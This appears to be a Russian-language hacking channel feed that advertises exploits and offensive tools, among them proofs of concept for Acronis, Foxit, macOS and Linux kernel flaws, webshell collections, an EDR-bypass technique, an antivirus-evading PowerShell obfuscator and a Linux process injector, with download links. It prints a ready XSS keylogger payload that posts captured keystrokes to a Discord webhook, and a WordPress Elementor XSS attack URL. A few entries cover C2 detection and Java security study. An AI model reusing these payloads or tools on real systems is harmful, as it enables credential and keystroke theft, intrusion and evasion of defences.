CVE-2022-45451
Acronis POC
download

Большая коллекция WEBSHELLS
На asp, aspx, php, jsp, pl, py, etc
download

#webshell

Super Xray
Web Vulnerability Scanner
download

#web #vuln #scanner

CVE-2022-28672
Foxit PDF Reader Remote Code Execution Exploit (NOT POC))))

Бэкдоры в FreePBX
PHP бэкдор, который добавляет своего пользователя (mgknight), удаляет законных юзеров, кодируется в base64 и переписывает .htaccess - встречайте на ваших серваках телефонии)))
Пятничное расследование читать

#freepbx #backdoor

Dirty Vanity
новая техника внедрения, злоупотребляющая Windows fork API для обхода EDR.
Слайды тут
POC тут

#windows #bypass #edr

MacDirtyCowDem
Получаем root в macOS 13.0.1 через CVE-2022-46689
exploit



#root #macos #exploit

powershell-obfuscation
Обфускатор Powershell anti-kill, простой и эффективный, проходит все VT (когда трава была зеленее)
download

linux injector

Инжектим в общие библиотеки x64 Linux. (без ptrace - а то на ptrace root права нужны, а права повышать в системе в падлу)
usage:

linux_injector <pid> <module>

Да да, все так просто, иди уже.

download

Только ВАЖНЫЕ вопросы !

#hackers #xss

Атаки на web-приложения на JAVA
Это обучающий проект, время от времени обновляется. Проект стремится поделиться технологиями, связанными с безопасностью Java, в краткой и ясной форме, упростить некоторые сложные технические вопросы и позволить изучить безопасность Java.
download
*
Bonus track
Jar Analyzer
GUI для анализа файлов JAR, особенно подходящий для анализа безопасности кода.
download

#java #security #web #hack

Cloudmare
Палим реальные IPадреса сайтов защищенных Cloudflare, Sucuri или Incapsula.
Но таки да - работает только если криво настроен DNS.
download

Php Remote file Inclusion and RCE in flatpressblog/flatpress
Proof of Concept

#php #vuln

log4j
ДА, еще один, но попроще
usage:
python3 hik.py https://localhost:443 xxx.oastify.com:80

downLoad

Оценка уязвимостей с помощью Nmap ?
Вам нужен Vultriever !
*
Из коробки Vultriever умеет:

Server IP address
Network port number
Network port status
Protocol used by the network port
Network service operating on the network port and its version
Vulnerability CVE-identifier
Vulnerability rating
URL-link to the denoscription of the vulnerability on the platform Vulners.com

Заказывайте прямо сейчас с уникальной финкой лгбт



Download

CVE-2022-2602 - exploit
Опубликован PoC Kernel Privilege Escalation Linux
*
О чем это, прочитать тут_1 и тут_2
*
POC (точнее два) - забрать
Exploit - забрать

#linux #kernel #exploits

Охота на C2 C&C сервера
Понимание работы и обнаружение фреймворков C2 (C&C)
*
1. Understanding & Detecting C2 Frameworks — TrevorC2
2. Understanding & Detecting C2 Frameworks — Ares
3. Understanding & Detecting C2 Frameworks — HARS (HTTP/S Asynchronous Reverse Shell)
4. Understanding & Detecting C2 Frameworks — BabyShark
*
BonusTrack:
Download BabyShark

#C2 #hackers #botnets

Linux Kernel RCE (ksmbd)
*
CVSS SCORE: 10 из 10
*
Детали тут
Патч прилетел в ядро только в ветке 5.15.61


#10из10

XSS Payload - Discord Keylogger
usage:
<img src onerror='let x=!1,l="";document.onkeypress=function(a){l+=a.key,x=!0},setInterval(()=>{x&&(fetch("//discord.com/api/webhook/...",{method:"post",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:l})}),x=!1)},1e3);'>

#discord #xss

Wordpress - XSS ( CVE-2022-29455)
/wp-content/plugins/elementor/assets/js/frontend.min.js
usage:
https://target_site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==

#wordpress #xss

CVE-2022-42046 Наконец то опубликовали
local privilege escalation
POC download

#windows #lpe #poc